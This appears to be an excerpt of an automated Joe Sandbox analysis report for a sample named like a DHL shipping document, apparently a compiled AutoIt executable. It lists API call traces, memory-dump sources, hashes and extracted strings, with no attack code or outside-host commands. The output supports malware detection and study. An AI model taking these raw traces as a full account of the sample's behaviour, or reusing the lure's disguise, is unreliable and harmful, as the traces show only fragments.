                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                  • String ID: 0
                                                                                  • API String ID: 464785882-4108050209
                                                                                  • Opcode ID: af33d9202f7365fdb8ecc5c7800e99a30f15b88fa7448cb7c38a38f3aa8d3ec9
                                                                                  • Instruction ID: f117a8a25a8bc8de41c686653e7b51e1a6f00ca19391c773ad23a60acdf92979
                                                                                  • Opcode Fuzzy Hash: af33d9202f7365fdb8ecc5c7800e99a30f15b88fa7448cb7c38a38f3aa8d3ec9
                                                                                  • Instruction Fuzzy Hash: A012CE70614205EFCB20CF24C884BA9B7E9FF55311F5446AAF899DB2A2C731EC42DB91
                                                                                  APIs
                                                                                  • DestroyWindow.USER32(00000000), ref: 009477F1
                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 009478B0
                                                                                  • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 009478EE
                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00947900
                                                                                  • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00947946
                                                                                  • GetClientRect.USER32(00000000,?), ref: 00947952
                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00947996
                                                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 009479A5
                                                                                  • GetStockObject.GDI32(00000011), ref: 009479B5
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 009479B9
                                                                                  • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 009479C9
                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009479D2
                                                                                  • DeleteDC.GDI32(00000000), ref: 009479DB
                                                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00947A07
                                                                                  • SendMessageW.USER32(00000030,00000000,00000001), ref: 00947A1E
                                                                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00947A59
                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00947A6D
                                                                                  • SendMessageW.USER32(00000404,00000001,00000000), ref: 00947A7E
                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00947AAE
                                                                                  • GetStockObject.GDI32(00000011), ref: 00947AB9
                                                                                  • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00947AC4
                                                                                  • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00947ACE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                  • API String ID: 2910397461-517079104
                                                                                  • Opcode ID: c268b8557b2c078596d30ff40176254f01e2d80fbac64fe1979f29636b4a1353
                                                                                  • Instruction ID: 8045a95c8ead72def2d9bc710f13bc0a7e067212290fc11dbcc2533ad7dbac21
                                                                                  • Opcode Fuzzy Hash: c268b8557b2c078596d30ff40176254f01e2d80fbac64fe1979f29636b4a1353
                                                                                  • Instruction Fuzzy Hash: 66A1A371A14209BFEB14DBA9DD4AFAEBBB9EB44711F004215FA14E72E0D770AD00DB60
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0093AF89
                                                                                  • GetDriveTypeW.KERNEL32(?,0095FAC0,?,\\.\,0095F910), ref: 0093B066
                                                                                  • SetErrorMode.KERNEL32(00000000,0095FAC0,?,\\.\,0095F910), ref: 0093B1C4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode$DriveType
                                                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                  • API String ID: 2907320926-4222207086
                                                                                  • Opcode ID: 7811f7c740c75b85875d7496a2d3d503c138f0d21fe5120d55d558cfcd1c6ef3
                                                                                  • Instruction ID: ab0c40183cc1af8bb741d6ec0a205953adc310cc943e20fba3b795207c898bb3
                                                                                  • Opcode Fuzzy Hash: 7811f7c740c75b85875d7496a2d3d503c138f0d21fe5120d55d558cfcd1c6ef3
                                                                                  • Instruction Fuzzy Hash: 9351E330A88305ABDB04EB94C9A297D73B1FB94345F204517E60AE7390D7B9AD01EF83
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: __wcsnicmp
                                                                                  • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                  • API String ID: 1038674560-86951937
                                                                                  • Opcode ID: e708b5eeeef97007137804dca86a76b1202bdd8651e95803ac95690346c0021f
                                                                                  • Instruction ID: dc570d1deb418c4218636993bbf8975c8bc3703acf3dcf58fe2fa4f01bc4b2a8
                                                                                  • Opcode Fuzzy Hash: e708b5eeeef97007137804dca86a76b1202bdd8651e95803ac95690346c0021f
                                                                                  • Instruction Fuzzy Hash: 888129B0600619BACB20AB75CC92FBE7758FF10714F044127FE46EA2C2FB60DA55C692
                                                                                  APIs
                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00959D41
                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00959DFA
                                                                                  • SendMessageW.USER32(?,00001102,00000002,?), ref: 00959E16
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window
                                                                                  • String ID: 0
                                                                                  • API String ID: 2326795674-4108050209
                                                                                  • Opcode ID: 38d9ab519e60bd5b80203b8e0d7d8aa43346caa327fedd9f42f70b887dee6b1d
                                                                                  • Instruction ID: b0ea67a6530c1d16cb4f81f57b9da02440bbb21267c769ed96221b2d141ed541
                                                                                  • Opcode Fuzzy Hash: 38d9ab519e60bd5b80203b8e0d7d8aa43346caa327fedd9f42f70b887dee6b1d
                                                                                  • Instruction Fuzzy Hash: 5F02F130118301AFE715CF26C859BAABBE9FF49316F048A2DFC95D62A1C734D948DB52
                                                                                  APIs
                                                                                  • GetSysColor.USER32(00000012), ref: 0095AB99
                                                                                  • SetTextColor.GDI32(?,?), ref: 0095AB9D
                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 0095ABB3
                                                                                  • GetSysColor.USER32(0000000F), ref: 0095ABBE
                                                                                  • CreateSolidBrush.GDI32(?), ref: 0095ABC3
                                                                                  • GetSysColor.USER32(00000011), ref: 0095ABDB
                                                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0095ABE9
                                                                                  • SelectObject.GDI32(?,00000000), ref: 0095ABFA
                                                                                  • SetBkColor.GDI32(?,00000000), ref: 0095AC03
                                                                                  • SelectObject.GDI32(?,?), ref: 0095AC10
                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 0095AC2F
                                                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0095AC46
                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0095AC5B
                                                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0095ACA7
                                                                                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0095ACCE
                                                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 0095ACEC
                                                                                  • DrawFocusRect.USER32(?,?), ref: 0095ACF7
                                                                                  • GetSysColor.USER32(00000011), ref: 0095AD05
                                                                                  • SetTextColor.GDI32(?,00000000), ref: 0095AD0D
                                                                                  • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0095AD21
                                                                                  • SelectObject.GDI32(?,0095A869), ref: 0095AD38
                                                                                  • DeleteObject.GDI32(?), ref: 0095AD43
                                                                                  • SelectObject.GDI32(?,?), ref: 0095AD49
                                                                                  • DeleteObject.GDI32(?), ref: 0095AD4E
                                                                                  • SetTextColor.GDI32(?,?), ref: 0095AD54
                                                                                  • SetBkColor.GDI32(?,?), ref: 0095AD5E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                  • String ID:
                                                                                  • API String ID: 1996641542-0
                                                                                  • Opcode ID: 55a14458e56c1d65bb0d86bc7091455ddcdbb27646c82dbd9af5a568b53f367f
                                                                                  • Instruction ID: b3833a80cb817223c5a85b8f6b63534b056184bc0ab89a9ad6c3b018fea8afa4
                                                                                  • Opcode Fuzzy Hash: 55a14458e56c1d65bb0d86bc7091455ddcdbb27646c82dbd9af5a568b53f367f
                                                                                  • Instruction Fuzzy Hash: 8C616C71904218EFDF11DFAADC48EAE7BB9EB08332F104225F915AB2A1D6759940DB90
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00958D34
                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00958D45
                                                                                  • CharNextW.USER32(0000014E), ref: 00958D74
                                                                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00958DB5
                                                                                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00958DCB
                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00958DDC
                                                                                  • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00958DF9
                                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00958E45
                                                                                  • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00958E5B
                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00958E8C
                                                                                  • _memset.LIBCMT ref: 00958EB1
                                                                                  • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00958EFA
                                                                                  • _memset.LIBCMT ref: 00958F59
                                                                                  • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00958F83
                                                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 00958FDB
                                                                                  • SendMessageW.USER32(?,0000133D,?,?), ref: 00959088
                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 009590AA
                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 009590F4
                                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00959121
                                                                                  • DrawMenuBar.USER32(?), ref: 00959130
                                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00959158
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                  • String ID: 0
                                                                                  • API String ID: 1073566785-4108050209
                                                                                  • Opcode ID: 601d3c2e5db4fa55a35d9476cf2a53e462e89f1cc188c5d1610430bc88223149
                                                                                  • Instruction ID: 732caf5ba85c43e1ad41390708ab91a5d2b5e91e0d09f95d7caec8c874384ead
                                                                                  • Opcode Fuzzy Hash: 601d3c2e5db4fa55a35d9476cf2a53e462e89f1cc188c5d1610430bc88223149
                                                                                  • Instruction Fuzzy Hash: 66E1A070905219AADF20DF66CC88EEF7BB9EF05311F008159FD15AA291DB348A89DF60
                                                                                  APIs
                                                                                  • GetCursorPos.USER32(?), ref: 00954C51
                                                                                  • GetDesktopWindow.USER32 ref: 00954C66
                                                                                  • GetWindowRect.USER32(00000000), ref: 00954C6D
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00954CCF
                                                                                  • DestroyWindow.USER32(?), ref: 00954CFB
                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00954D24
                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00954D42
                                                                                  • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00954D68
                                                                                  • SendMessageW.USER32(?,00000421,?,?), ref: 00954D7D
                                                                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00954D90
                                                                                  • IsWindowVisible.USER32(?), ref: 00954DB0
                                                                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00954DCB
                                                                                  • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00954DDF
                                                                                  • GetWindowRect.USER32(?,?), ref: 00954DF7
                                                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 00954E1D
                                                                                  • GetMonitorInfoW.USER32(00000000,?), ref: 00954E37
                                                                                  • CopyRect.USER32(?,?), ref: 00954E4E
                                                                                  • SendMessageW.USER32(?,00000412,00000000), ref: 00954EB9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                  • String ID: ($0$tooltips_class32
                                                                                  • API String ID: 698492251-4156429822
                                                                                  • Opcode ID: 3dce3b85487e1454baff78f379e64273d4c39a1a24bbc8af92f2a40ab31e6435
                                                                                  • Instruction ID: d9c4f25edf634ffadafb2ab9057b5922c9d1c056e189e4cd36d88db2b118e51f
                                                                                  • Opcode Fuzzy Hash: 3dce3b85487e1454baff78f379e64273d4c39a1a24bbc8af92f2a40ab31e6435
                                                                                  • Instruction Fuzzy Hash: 72B19E71618341AFDB44DF26C849B6ABBE4FF84315F008A1DF9999B2A1D770EC48CB52
                                                                                  APIs
                                                                                  • GetFileVersionInfoSizeW.VERSION(?,?), ref: 009346E8
                                                                                  • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0093470E
                                                                                  • _wcscpy.LIBCMT ref: 0093473C
                                                                                  • _wcscmp.LIBCMT ref: 00934747
                                                                                  • _wcscat.LIBCMT ref: 0093475D
                                                                                  • _wcsstr.LIBCMT ref: 00934768
                                                                                  • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00934784
                                                                                  • _wcscat.LIBCMT ref: 009347CD
                                                                                  • _wcscat.LIBCMT ref: 009347D4
                                                                                  • _wcsncpy.LIBCMT ref: 009347FF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                  • API String ID: 699586101-1459072770
                                                                                  • Opcode ID: fd17c81ba948fcefc6344d26377a4d88f69006e00a799f13d87389b9410517fd
                                                                                  • Instruction ID: b753a199a91b13c1b1af369062cc9986b37228c5d64e1387a6441fcbcc57a7b8
                                                                                  • Opcode Fuzzy Hash: fd17c81ba948fcefc6344d26377a4d88f69006e00a799f13d87389b9410517fd
                                                                                  • Instruction Fuzzy Hash: B7412D716042087ADB10F7798C47EBF77ACEF45720F140166FA05E6182EF74AA015BA7
                                                                                  APIs
                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008D28BC
                                                                                  • GetSystemMetrics.USER32(00000007), ref: 008D28C4
                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008D28EF
                                                                                  • GetSystemMetrics.USER32(00000008), ref: 008D28F7
                                                                                  • GetSystemMetrics.USER32(00000004), ref: 008D291C
                                                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 008D2939
                                                                                  • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 008D2949
                                                                                  • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 008D297C
                                                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 008D2990
                                                                                  • GetClientRect.USER32(00000000,000000FF), ref: 008D29AE
                                                                                  • GetStockObject.GDI32(00000011), ref: 008D29CA
                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 008D29D5
                                                                                    • Part of subcall function 008D2344: GetCursorPos.USER32(?), ref: 008D2357
                                                                                    • Part of subcall function 008D2344: ScreenToClient.USER32(009967B0,?), ref: 008D2374
                                                                                    • Part of subcall function 008D2344: GetAsyncKeyState.USER32(00000001), ref: 008D2399
                                                                                    • Part of subcall function 008D2344: GetAsyncKeyState.USER32(00000002), ref: 008D23A7
                                                                                  • SetTimer.USER32(00000000,00000000,00000028,008D1256), ref: 008D29FC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                  • String ID: AutoIt v3 GUI
                                                                                  • API String ID: 1458621304-248962490
                                                                                  • Opcode ID: c64910171c87562523890fbb1753c9b8f15c6ef5da17fa65e72f17bbcd3a8f9d
                                                                                  • Instruction ID: 4acf832e4b44fc9ed255f9750d10602053c5b2a05c8b60ab50245472e80a560c
                                                                                  • Opcode Fuzzy Hash: c64910171c87562523890fbb1753c9b8f15c6ef5da17fa65e72f17bbcd3a8f9d
                                                                                  • Instruction Fuzzy Hash: A9B1AD70A1420AEFDB14DFA9CC55BAE7BB4FB18315F10822AFA15E72D0DB30A841DB50
                                                                                  APIs
                                                                                  • CharUpperBuffW.USER32(?,?), ref: 009540F6
                                                                                  • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 009541B6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharMessageSendUpper
                                                                                  • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                  • API String ID: 3974292440-719923060
                                                                                  • Opcode ID: 83d865f8299e99a9b21feda14d3fd98f6793c80894708696492e08699c2d2e1d
                                                                                  • Instruction ID: be40cf9ed67d5b3cf2dbc72525da9a72049fc062469ba30b41e4e638a32adef6
                                                                                  • Opcode Fuzzy Hash: 83d865f8299e99a9b21feda14d3fd98f6793c80894708696492e08699c2d2e1d
                                                                                  • Instruction Fuzzy Hash: D8A1D1302143159FCB14FF25C951A6AB3E5FF84319F144A29F8A69B3A2DB34EC49CB52
                                                                                  APIs
                                                                                  • LoadCursorW.USER32(00000000,00007F89), ref: 00945309
                                                                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 00945314
                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 0094531F
                                                                                  • LoadCursorW.USER32(00000000,00007F03), ref: 0094532A
                                                                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 00945335
                                                                                  • LoadCursorW.USER32(00000000,00007F01), ref: 00945340
                                                                                  • LoadCursorW.USER32(00000000,00007F81), ref: 0094534B
                                                                                  • LoadCursorW.USER32(00000000,00007F88), ref: 00945356
                                                                                  • LoadCursorW.USER32(00000000,00007F80), ref: 00945361
                                                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 0094536C
                                                                                  • LoadCursorW.USER32(00000000,00007F83), ref: 00945377
                                                                                  • LoadCursorW.USER32(00000000,00007F85), ref: 00945382
                                                                                  • LoadCursorW.USER32(00000000,00007F82), ref: 0094538D
                                                                                  • LoadCursorW.USER32(00000000,00007F84), ref: 00945398
                                                                                  • LoadCursorW.USER32(00000000,00007F04), ref: 009453A3
                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 009453AE
                                                                                  • GetCursorInfo.USER32(?), ref: 009453BE
                                                                                  • GetLastError.KERNEL32(00000001,00000000), ref: 009453E9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
